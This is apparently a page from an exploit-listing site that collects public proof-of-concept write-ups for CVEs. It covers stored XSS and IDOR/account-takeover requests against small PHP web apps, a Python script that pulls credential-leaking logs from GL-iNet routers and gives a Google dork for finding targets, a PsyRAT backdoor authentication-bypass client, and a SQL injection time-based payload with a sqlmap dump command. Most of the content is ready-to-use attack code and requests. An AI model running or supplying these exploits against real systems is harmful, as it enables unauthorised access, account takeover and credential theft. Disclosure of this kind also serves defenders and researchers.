Latest exploits :: CodePwn

<pre><code>#Vulnerability Details: #Application Name: Computer Laboratory Management System #Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html #Vendor Homepage: https://www.sourcecodester.com/users/tips23 #BuG: Insecure Direct Object References (IDOR) and Account Takeover #BuG_Author: SoSPiro #CVE: CVE-2024-3140 # Vulnerable code section: foreach($_POST as $k => $v){ $v = $this->conn->real_escape_string($v); if(in_array($k, $main_field)){ if(!empty($data)) $data .= ", "; $data .= " `{$k}` = '{$v}' "; } } - The vulnerable section of the code lies within the registration() method of the Users class. Specifically, the lack of proper validation and sanitization of user input allows for potential Cross-Site Scripting (XSS) attacks. # Vulnerability Description: - The vulnerability arises due to the lack of proper validation and sanitization of user-supplied data before it is used in constructing SQL queries. This allows an attacker to inject malicious scripts, such as JavaScript code, into the database. When the administrator views the user list, the injected script gets executed, leading to a Cross-Site Scripting (XSS) attack. # Proof of Concept (PoC): - Poc Video : https://drive.google.com/file/d/1iTJZz3QzLUkKeso5iHfBMlNbIwZy1X-Y/view?usp=sharing - Request: POST /php-lms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------381104392340117332004262429571 Content-Length: 946 Origin: http://localhost Connection: close Referer: http://localhost/php-lms/admin/?page=user Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin X-PwnFox-Color: green -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="id" 8 -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="firstname" staff2 -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="middlename" <script>alert(1)</script> -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="lastname" asd -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="username" staff -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="password" -----------------------------381104392340117332004262429571 Content-Disposition: form-data; name="img"; filename="" Content-Type: application/octet-stream -----------------------------381104392340117332004262429571-- - In this POST request, an attacker has included a script tag in the "middlename" field: <script>alert(1)</script> - When the administrator views the user list, this script tag will be executed, leading to the alert dialog box with the message "1" being displayed. This demonstrates the XSS vulnerability in the application. # Impact: - The impact of this vulnerability is significant. An attacker can execute arbitrary JavaScript code within the context of the administrator's session, potentially leading to theft of sensitive information, session hijacking, or defacement of the application. Additionally, since the XSS payload executes within the administrator's session, it can lead to further exploitation of the system or its users. # Reproduce: https://github.com/Sospiro014/zday1/blob/main/xss_1.md https://vuldb.com/?id.258915 https://www.cve.org/CVERecord?id=CVE-2024-3140 </code></pre>

<pre><code>#Vulnerability Details: #Application Name: Computer Laboratory Management System #Software Link: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html #Vendor Homepage: https://www.sourcecodester.com/users/tips23 #BuG: Insecure Direct Object References (IDOR) and Account Takeover #BuG_Author: SoSPiro #CVE: CVE-2024-3139 # Vulnerable code section: if(!empty($_FILES['img']['tmp_name'])){ if(!is_dir(base_app."uploads/avatars")) mkdir(base_app."uploads/avatars"); $ext = pathinfo($_FILES['img']['name'], PATHINFO_EXTENSION); $fname = "uploads/avatars/$id.png"; // The $id value is directly used in the file path // Rest of the code } # Vulnerability Description: This vulnerability exists in the section of code responsible for handling file uploads. The $id variable, obtained from user input ($_POST), is utilized directly in constructing the file path without appropriate validation or authorization checks, leading to both IDOR and account takeover vulnerabilities. This allows an attacker to manipulate the $id parameter to access and modify files of other users, including administrators. # Proof of Concept (PoC): - Poc Video : https://drive.google.com/file/d/1P0Vg_sYM9S43_rJTe1l5E2Vt9gzvb0YX/view?usp=sharing - Request: POST /php-lms/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------38244968796537297751592545024 Content-Length: 8393 Origin: http://localhost Connection: close Referer: http://localhost/php-lms/admin/?page=user Cookie: PHPSESSID=3oor3gc9ih6iq8fu6qpjf50si8 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin X-PwnFox-Color: green -----------------------------38244968796537297751592545024 Content-Disposition: form-data; name="id" 7 -----------------------------38244968796537297751592545024 Content-Disposition: form-data; name="firstname" testtt -----------------------------38244968796537297751592545024 Content-Disposition: form-data; name="middlename" testMiddle -----------------------------38244968796537297751592545024 Content-Disposition: form-data; name="lastname" te Last Name -----------------------------38244968796537297751592545024 Content-Disposition: form-data; name="username" admin2 -----------------------------38244968796537297751592545024 Content-Disposition: form-data; name="password" qwe123 -----------------------------38244968796537297751592545024 Content-Disposition: form-data; name="img"; filename="hack.png" Content-Type: image/png PNG ... - Response: HTTP/1.1 200 OK Date: Mon, 01 Apr 2024 10:19:19 GMT Server: Apache/2.4.54 (Win64) PHP/8.2.0 mod_fcgid/2.3.10-dev X-Powered-By: PHP/8.2.0 X-Xdebug-Profile-Filename: c:/wamp64/tmp\trace.localhost.1711966759.10780.cgrind Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 # Impact: This vulnerability allows attackers to access and modify user data and profile pictures, leading to potential phishing, distribution of malicious content, and reputational damage. Additionally, unauthorized access to administrator accounts can occur, resulting in the compromise of sensitive information. This poses a significant risk to the security and usability of the application. # Reproduce: https://github.com/Sospiro014/zday1/blob/main/idor%2Baccaunt_takeover.md https://vuldb.com/?id.258914 https://www.cve.org/CVERecord?id=CVE-2024-3139 </code></pre>

<pre><code># Exploit Title: GL-iNet MT6000 4.5.5 - Arbitrary File Download # CVE: CVE-2024-27356 # Google Dork: intitle:"GL.iNet Admin Panel" # Date: 2/26/2024 # Exploit Author: Bandar Alharbi (aggressor) # Vendor Homepage: www.gl-inet.com # Tested Software Link: https://fw.gl-inet.com/firmware/x3000/release/openwrt-x3000-4.0-0406release1-0123-1705996441.bin # Tested Model: GL-X3000 Spitz AX # Affected Products and Firmware Versions: https://github.com/gl-inet/CVE-issues/blob/main/4.0.0/Download_file_vulnerability.md import sys import requests import json requests.packages.urllib3.disable_warnings() h = {'Content-type':'application/json;charset=utf-8', 'User-Agent':'Mozilla/5.0 (compatible;contxbot/1.0)'} def DoesTarExist(): r = requests.get(url+"/js/logread.tar", verify=False, timeout=30, headers=h) if r.status_code == 200: f = open("logread.tar", "wb") f.write(r.content) f.close() print("[*] Full logs archive `logread.tar` has been downloaded!") print("[*] Do NOT forget to untar it and grep it! It leaks confidential info such as credentials, registered Device ID and a lot more!") return True else: print("[*] The `logread.tar` archive does not exist however ... try again later!") return False def isVulnerable(): r1 = requests.post(url+"/rpc", verify=False, timeout=30, headers=h) if r1.status_code == 500 and "nginx" in r1.text: r2 = requests.get(url+"/views/gl-sdk4-ui-login.common.js", verify=False, timeout=30, headers=h) if "Admin-Token" in r2.text: j = {"jsonrpc":"2.0","id":1,"method":"call","params":["","ui","check_initialized"]} r3 = requests.post(url+"/rpc", verify=False, json=j, timeout=30, headers=h) ver = r3.json()['result']['firmware_version'] model = r3.json()['result']['model'] if ver.startswith(('4.')): print("[*] Firmware version (%s) is vulnerable!" %ver) print("[*] Device model is: %s" %model) return True print("[*] Either the firmware version is not vulnerable or the target may not be a GL.iNet device!") return False def isAlive(): try: r = requests.get(url, verify=False, timeout=30, headers=h) if r.status_code != 200: print("[*] Make sure the target's web interface is accessible!") return False elif r.status_code == 200: print("[*] The target is reachable!") return True except Exception: print("[*] Error occurred when connecting to the target!") pass return False if __name__ == '__main__': if len(sys.argv) != 2: print("exploit.py url") sys.exit(0) url = sys.argv[1] url = url.lower() if not url.startswith(('http://', 'https://')): print("[*] Invalid url format! It should be http[s]://<domain or ip>") sys.exit(0) if url.endswith("/"): url = url.rstrip("/") print("[*] GL.iNet Unauthenticated Full Logs Downloader") try: if (isAlive() and isVulnerable()) == (True and True): DoesTarExist() except KeyboardInterrupt: print("[*] The exploit has been stopped by the user!") sys.exit(0) </code></pre>

<pre><code># Exploit Title: Blood Bank v1.0 Stored Cross Site Scripting (XSS) # Date: 2023-11-14 # Exploit Author: Ersin Erenler # Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code # Software Link: https://download-media.code-projects.org/2020/11/Blood_Bank_In_PHP_With_Source_code.zip # Version: 1.0 # Tested on: Windows/Linux, Apache 2.4.54, PHP 8.2.0 # CVE : CVE-2023-46020 ------------------------------------------------------------------------------- # Description: The parameters rename, remail, rphone, and rcity in the /file/updateprofile.php file of Code-Projects Blood Bank V1.0 are susceptible to Stored Cross-Site Scripting (XSS). This vulnerability arises due to insufficient input validation and sanitation of user-supplied data. An attacker can exploit this weakness by injecting malicious scripts into these parameters, which, when stored on the server, may be executed when other users view the affected user's profile. Vulnerable File: updateprofile.php Parameters: rename, remail, rphone, rcity # Proof of Concept: ---------------------- 1. Intercept the POST request to updateprofile.php via Burp Suite 2. Inject the payload to the vulnerable parameters 3. Payload: "><svg/onload=alert(document.domain)> 4. Example request for rname parameter: --- POST /bloodbank/file/updateprofile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 103 Origin: http://localhost Connection: close Referer: http://localhost/bloodbank/rprofile.php?id=1 Cookie: PHPSESSID=<some-cookie-value> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 rname=test"><svg/onload=alert(document.domain)>&remail=test%40gmail.com&rpassword=test&rphone=8875643456&rcity=lucknow&bg=A%2B&update=Update ---- 5. Go to the profile page and trigger the XSS XSS Payload: "><svg/onload=alert(document.domain)> </code></pre>

<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024 Original source: https://malvuln.com/advisory/0e6e40aad3e8d46e3c0c26ccc6ab94b3.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Agent.ju (PSYRAT) Vulnerability: Authentication Bypass RCE Family: PSYRAT Type: PE32 MD5: 0e6e40aad3e8d46e3c0c26ccc6ab94b3 Vuln ID: MVID-2024-0677 Disclosure: 04/01/2024 Description: The PsyRAT 0.01 malware listens on random high TCP ports 53297, 53211, 532116 and so forth. Connecting to an infected host returns a logon prompt for PASS. However, you can enter anything or nothing at all and execute commands made available by the backdoor. The malware will return a BADPWD and or "Invalid command" error string but the command executes regardless. Custom client is required as it seems to dislike CRLF \r\n characters when using netcat or telnet. getdrives C\ - Fixed Drive^D\ - CD-ROM^ cpuinfo Windows Version |System Directory C\WINDOWS\system32|Computer Name DESKTOP-2C4IQJO|Username VICTIM|CPU Speed 2808 MHz|CPU Type GenuineIntel|------|PsyRAT Version PsyRAT 1.02|IP/Port 192.168.18.130|Password |Install name |Reg value |PHP URL exe_sho [Program_Name] starts a program Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=55116 s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) #send bad password PAYLOAD="malvuln" s.send(PAYLOAD.encode()) #call commands PAYLOAD="exe_sho calc" s.send(PAYLOAD.encode()) s.close() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: Daily Habit Tracker 1.0 - Broken Access Control # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24496 ### Broken Access Control: > Broken Access Control is a security vulnerability arising when a web application inadequately restricts user access to specific resources and functions. It involves ensuring users are authorized only for the resources and functionalities intended for them. ### Affected Components: > home.php, add-tracker.php, delete-tracker.php, update-tracker.php ### Description: > Broken access control enables unauthenticated attackers to access the home page and to create, update, or delete trackers without providing credentials. ## Proof of Concept: ### Unauthenticated Access to Home page > To bypass authentication, navigate to 'http://yourwebsitehere.com/home.php'. The application does not verify whether the user is authenticated or authorized to access this page. ### Create Tracker as Unauthenticated User To create a tracker, use the following request: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 108 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1443-01-02&day=Monday&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ### Update Tracker as Unauthenticated User To update a tracker, use the following request: ``` POST /habit-tracker/endpoint/update-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 121 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 tbl_tracker_id=5&date=1443-01-02&day=Monday&exercise=No&pray=Yes&read_book=No&vitamins=Yes&laundry=No&alcohol=No&meat=Yes ``` ### Delete Tracker as Unauthenticated User: To delete a tracker, use the following request: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure that proper access controls are in place. </code></pre>

<pre><code># Exploit Title: Daily Habit Tracker 1.0 - SQL Injection # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24495 ### SQL Injection: > SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system. ### Affected Components: > delete-tracker.php ### Description: > The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests. ## Proof of Concept: ### Manual Exploitation The payload `'"";SELECT SLEEP(5)#` can be employed to force the database to sleep for 5 seconds: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5'""%3bSELECT+SLEEP(5)%23 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` ![5 seconds delay](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/sqli.png?raw=true) ### SQLMap Save the following request to `delete_tracker.txt`: ``` GET /habit-tracker/endpoint/delete-tracker.php?tracker=5 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 ``` Use `sqlmap` with `-r` option to exploit the vulnerability: ``` sqlmap -r ./delete_tracker.txt --level 5 --risk 3 --batch --technique=T --dump ``` ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters. </code></pre>

<pre><code># Exploit Title: Daily Habit Tracker 1.0 - Stored Cross-Site Scripting (XSS) # Date: 2 Feb 2024 # Exploit Author: Yevhenii Butenko # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/17118/daily-habit-tracker-using-php-and-mysql-source-code.html # Version: 1.0 # Tested on: Debian # CVE : CVE-2024-24494 ### Stored Cross-Site Scripting (XSS): > Stored Cross-Site Scripting (XSS) is a web security vulnerability where an attacker injects malicious scripts into a web application's database. The malicious script is saved on the server and later rendered in other users' browsers. When other users access the affected page, the stored script executes, potentially stealing data or compromising user security. ### Affected Components: > add-tracker.php, update-tracker.php Vulnerable parameters: - day - exercise - pray - read_book - vitamins - laundry - alcohol - meat ### Description: > Multiple parameters within `Add Tracker` and `Update Tracker` requests are vulnerable to Stored Cross-Site Scripting. The application failed to sanitize user input while storing it to the database and reflecting back on the page. ## Proof of Concept: The following payload `<script>alert('STORED_XSS')</script>` can be used in order to exploit the vulnerability. Below is an example of a request demonstrating how a malicious payload can be stored within the `day` value: ``` POST /habit-tracker/endpoint/add-tracker.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 175 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/habit-tracker/home.php Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 date=1992-01-12&day=Tuesday%3Cscript%3Ealert%28%27STORED_XSS%27%29%3C%2Fscript%3E&exercise=Yes&pray=Yes&read_book=Yes&vitamins=Yes&laundry=Yes&alcohol=Yes&meat=Yes ``` ![XSS Fired](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/xss.png?raw=true) ## Recommendations When using this tracking system, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters. </code></pre>